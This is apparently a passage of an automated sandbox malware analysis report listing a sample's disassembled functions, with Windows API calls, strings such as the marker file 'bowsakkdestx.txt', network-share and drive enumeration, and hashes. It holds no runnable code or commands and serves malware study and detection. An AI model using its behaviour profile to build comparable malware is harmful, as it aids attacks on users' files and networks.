                                                                                                  • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                                  • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                                                                                  • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$CreateShowUpdate
                                                                                                  • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                  • API String ID: 2944774295-3503800400
                                                                                                  • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                  • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                                                                                                  • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                                  • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                                                                                                  • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                                                                                                  • _memset.LIBCMT ref: 00410C4C
                                                                                                  • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 364255426-0
                                                                                                  • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                  • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                                  • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                                  • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004416EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 00441726
                                                                                                  • _strlen.LIBCMT ref: 00441734
                                                                                                    • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                  • _strnlen.LIBCMT ref: 004417BF
                                                                                                  • __lock.LIBCMT ref: 004417D0
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 004417DB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2168648987-0
                                                                                                  • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                  • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                                                                                                  • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                  • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                                  • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                                  • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                  • String ID:
                                                                                                  • API String ID: 2560635915-0
                                                                                                  • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                                  • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                                                                                  • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                                  • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0043B70B
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(008B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _free.LIBCMT ref: 0043B71E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap_free_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1020059152-0
                                                                                                  • Opcode ID: d70b67a4a7fe440acc7419d06ec2b6f75a63a325c355f2e5d89529d3462600c6
                                                                                                  • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                                                                                  • Opcode Fuzzy Hash: d70b67a4a7fe440acc7419d06ec2b6f75a63a325c355f2e5d89529d3462600c6
                                                                                                  • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041F0B6
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                                                                                                  • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                  • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                                  • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                                  • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041E546
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                                                                                                  • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                  • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                                  • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                                  • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041FA7B
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                  • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                                                                                                  • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                  • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041FDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041FE2B
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                  • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                                                                                                  • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                  • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                  • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                                                                                                  • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                  • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                  • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                                  • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                  • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00425341 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnlen
                                                                                                  • String ID: U
                                                                                                  • API String ID: 3628947076-3372436214
                                                                                                  • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                  • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                                                                                                  • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                  • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                                  • API String ID: 2102423945-2013712220
                                                                                                  • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                  • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                                                                                  • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                  • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringUuid$CreateFree
                                                                                                  • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                  • API String ID: 3044360575-2335240114
                                                                                                  • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                                  • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                                                                                  • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                                  • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 29327785-2616962270
                                                                                                  • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                                  • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                                                                                                  • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                                  • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                  • RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ClassCursorLoadRegister
                                                                                                  • String ID: 0$LPCWSTRszWindowClass
                                                                                                  • API String ID: 1693014935-1496217519
                                                                                                  • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                  • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                                                                                                  • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                  • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000001.00000002.2007683946.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000001.00000002.2007683946.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_1_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendDeleteFileFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 610490371-2616962270
                                                                                                  • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                  • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                                                                                  • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                  • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00419E70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
